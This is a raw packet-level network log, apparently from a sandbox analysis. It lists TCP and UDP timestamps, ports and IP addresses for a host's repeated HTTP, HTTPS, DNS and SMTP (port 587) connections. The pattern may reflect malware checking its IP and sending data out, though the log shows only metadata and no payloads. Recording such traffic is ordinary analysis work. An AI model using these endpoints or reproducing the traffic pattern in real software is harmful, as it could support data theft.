Jul 27, 2024 11:01:13.289705038 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.289711952 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.289741993 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.289762974 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.290512085 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.290555000 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.290587902 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.290595055 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.290622950 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.290640116 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.373450994 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.373517036 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.373682976 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.373692989 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.373739004 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.374030113 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.374080896 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.374188900 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.374197960 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.374249935 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.374835014 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.374881983 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.374933958 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.374942064 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.374996901 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.375936031 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.375979900 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.376018047 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.376025915 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.376048088 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.376070023 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.376524925 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.376573086 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.376605034 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.376614094 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.376646042 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.376663923 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.378012896 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.378052950 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.378096104 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.378117085 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.378137112 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.378165007 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.378717899 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.378761053 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.378793955 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.378802061 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.378830910 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.378854990 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.379651070 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.379728079 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.379735947 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.379803896 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.379862070 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.380280972 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:07.347486019 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:07.352997065 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:07.353086948 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:07.353291988 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:07.360083103 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:08.996977091 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:09.004376888 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:09.009280920 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:09.398823977 CEST	49730	80	192.168.2.4	188.114.96.3
Jul 27, 2024 11:02:09.898679972 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:09.943016052 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:10.090336084 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.090380907 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:10.090498924 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.104207993 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.104227066 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:10.712882996 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:10.712959051 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.716775894 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.716790915 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:10.717257977 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:10.771094084 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.779409885 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:10.820580959 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:11.241895914 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:11.242083073 CEST	443	49741	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:11.242360115 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:11.247332096 CEST	49741	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:11.250312090 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:11.255759954 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:12.381968975 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:12.385056019 CEST	49742	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:12.385101080 CEST	443	49742	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:12.385384083 CEST	49742	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:12.386131048 CEST	49742	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:12.386169910 CEST	443	49742	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:12.427973032 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:12.887535095 CEST	443	49742	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:12.888875961 CEST	49742	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:12.888915062 CEST	443	49742	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:13.044984102 CEST	443	49742	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:13.045150042 CEST	443	49742	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:13.045203924 CEST	49742	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:13.045574903 CEST	49742	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:13.048499107 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:13.049725056 CEST	49743	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:13.055771112 CEST	80	49740	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:13.055828094 CEST	49740	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:13.055911064 CEST	80	49743	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:13.055973053 CEST	49743	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:13.056056023 CEST	49743	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:13.060988903 CEST	80	49743	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:14.324662924 CEST	80	49743	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:14.325864077 CEST	49744	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:14.325944901 CEST	443	49744	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:14.326045990 CEST	49744	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:14.326262951 CEST	49744	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:14.326299906 CEST	443	49744	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:14.364849091 CEST	49743	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:14.788216114 CEST	443	49744	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:14.789730072 CEST	49744	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:14.789804935 CEST	443	49744	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:14.915313959 CEST	443	49744	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:14.915493011 CEST	443	49744	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:14.915709972 CEST	49744	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:14.916013956 CEST	49744	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:14.921073914 CEST	49745	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:14.926129103 CEST	80	49745	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:14.926240921 CEST	49745	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:14.926312923 CEST	49745	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:14.931272030 CEST	80	49745	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:16.867455959 CEST	80	49745	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:16.869373083 CEST	49746	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:16.869422913 CEST	443	49746	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:16.869597912 CEST	49746	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:16.869863987 CEST	49746	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:16.869874954 CEST	443	49746	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:16.911864996 CEST	49745	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:17.350270033 CEST	443	49746	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:17.352255106 CEST	49746	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:17.352279902 CEST	443	49746	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:17.478106022 CEST	443	49746	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:17.478297949 CEST	443	49746	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:17.478375912 CEST	49746	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:17.478703022 CEST	49746	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:17.482346058 CEST	49745	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:17.482976913 CEST	49747	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:17.493518114 CEST	80	49747	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:17.493664980 CEST	49747	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:17.493988991 CEST	80	49745	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:17.494065046 CEST	49745	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:17.497003078 CEST	49747	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:17.501905918 CEST	80	49747	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:20.088751078 CEST	80	49747	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:20.090254068 CEST	49748	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:20.090302944 CEST	443	49748	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:20.090511084 CEST	49748	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:20.090739965 CEST	49748	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:20.090749025 CEST	443	49748	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:20.130484104 CEST	49747	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:20.558190107 CEST	443	49748	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:20.559478045 CEST	49748	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:20.559506893 CEST	443	49748	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:20.698689938 CEST	443	49748	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:20.698926926 CEST	443	49748	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:20.698996067 CEST	49748	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:20.699330091 CEST	49748	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:20.703486919 CEST	49747	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:20.703989029 CEST	49749	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:20.709501982 CEST	80	49749	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:20.709583044 CEST	49749	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:20.709655046 CEST	49749	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:20.709701061 CEST	80	49747	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:20.709752083 CEST	49747	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:20.716646910 CEST	80	49749	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:21.570044041 CEST	80	49749	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:21.571422100 CEST	49750	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:21.571502924 CEST	443	49750	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:21.571594954 CEST	49750	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:21.571808100 CEST	49750	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:21.571825027 CEST	443	49750	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:21.614927053 CEST	49749	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:22.049288034 CEST	443	49750	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:22.051201105 CEST	49750	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:22.051280975 CEST	443	49750	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:22.215121031 CEST	443	49750	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:22.215326071 CEST	443	49750	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:22.215396881 CEST	49750	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:22.215770960 CEST	49750	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:22.220463991 CEST	49749	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:22.222151041 CEST	49751	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:22.238049984 CEST	80	49751	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:22.238110065 CEST	49751	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:22.238229990 CEST	49751	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:22.241162062 CEST	80	49749	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:22.241213083 CEST	49749	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:22.243180990 CEST	80	49751	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:24.130825996 CEST	80	49751	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:24.132910967 CEST	49752	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:24.132949114 CEST	443	49752	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:24.133025885 CEST	49752	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:24.133505106 CEST	49752	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:24.133521080 CEST	443	49752	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:24.177396059 CEST	49751	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:24.619652987 CEST	443	49752	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:24.621536970 CEST	49752	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:24.621562958 CEST	443	49752	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:24.769272089 CEST	443	49752	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:24.769515038 CEST	443	49752	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:24.769583941 CEST	49752	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:24.770102024 CEST	49752	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:24.774667025 CEST	49751	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:24.775954962 CEST	49753	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:24.780457020 CEST	80	49751	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:24.780519962 CEST	49751	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:24.780786991 CEST	80	49753	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:24.780865908 CEST	49753	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:24.780946016 CEST	49753	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:24.787678003 CEST	80	49753	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:26.591378927 CEST	80	49753	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:26.593185902 CEST	49754	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:26.593269110 CEST	443	49754	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:26.593624115 CEST	49754	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:26.593734980 CEST	49754	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:26.593763113 CEST	443	49754	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:26.646222115 CEST	49753	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:27.069132090 CEST	443	49754	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:27.070377111 CEST	49754	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:27.070452929 CEST	443	49754	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:27.233016968 CEST	443	49754	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:27.233223915 CEST	443	49754	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:27.233706951 CEST	49754	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:27.234194994 CEST	49754	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:27.236361980 CEST	49753	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:27.237504005 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:27.245806932 CEST	80	49753	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:27.245984077 CEST	49753	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:27.246465921 CEST	80	49755	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:27.246557951 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:27.246714115 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:27.256393909 CEST	80	49755	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:28.870507956 CEST	80	49755	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:28.870567083 CEST	80	49755	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:28.870769024 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:28.871113062 CEST	80	49755	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:28.871284962 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:28.872262001 CEST	49756	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:28.872304916 CEST	443	49756	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:28.872370958 CEST	49756	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:28.872689962 CEST	49756	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:28.872704029 CEST	443	49756	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:29.344449043 CEST	443	49756	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:29.345997095 CEST	49756	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:29.346081018 CEST	443	49756	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:29.482310057 CEST	443	49756	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:29.482526064 CEST	443	49756	188.114.97.3	192.168.2.4
Jul 27, 2024 11:02:29.482690096 CEST	49756	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:29.483047009 CEST	49756	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:02:29.506905079 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:29.513570070 CEST	80	49755	132.226.8.169	192.168.2.4
Jul 27, 2024 11:02:29.513755083 CEST	49755	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:29.515084982 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:29.515166044 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:29.515248060 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:29.515953064 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:29.516035080 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.143641949 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.143968105 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:30.146590948 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:30.146615982 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.147017956 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.148222923 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:30.192543030 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.379812956 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.379988909 CEST	443	49757	149.154.167.220	192.168.2.4
Jul 27, 2024 11:02:30.380192995 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:30.387938023 CEST	49757	443	192.168.2.4	149.154.167.220
Jul 27, 2024 11:02:36.184498072 CEST	49743	80	192.168.2.4	132.226.8.169
Jul 27, 2024 11:02:36.707026005 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:36.712007999 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:36.712331057 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:37.586956978 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:37.589591980 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:37.595321894 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:37.785376072 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:37.785599947 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:37.791141987 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:37.987847090 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:37.990333080 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:37.995238066 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.217262030 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.217885971 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.217921972 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.217961073 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:38.234085083 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:38.239542007 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.433582067 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.437230110 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:38.454910040 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.649183989 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.651582003 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:38.658123970 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.856816053 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:38.858755112 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:38.864383936 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.195014000 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.197226048 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.202919960 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.392971992 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.393471956 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.399142027 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.614377975 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.615365028 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.621253967 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.812310934 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.818906069 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.819145918 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.819145918 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.819145918 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.819171906 CEST	49758	587	192.168.2.4	185.123.204.162
Jul 27, 2024 11:02:39.824350119 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824398041 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824426889 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824515104 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824553967 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824582100 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824636936 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824666977 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:39.824695110 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:40.225723028 CEST	587	49758	185.123.204.162	192.168.2.4
Jul 27, 2024 11:02:40.271497965 CEST	49758	587	192.168.2.4	185.123.204.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 27, 2024 11:01:09.568922043 CEST	59743	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:01:09.576827049 CEST	53	59743	1.1.1.1	192.168.2.4
Jul 27, 2024 11:01:11.413727999 CEST	54755	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:01:11.425360918 CEST	53	54755	1.1.1.1	192.168.2.4
Jul 27, 2024 11:02:07.333765984 CEST	54823	53	192.168.2.4	1.1.1.1
Jul 27, 2024 11:02:07.341960907 CEST	53	54823	1.1.1.1	192.168.2.4
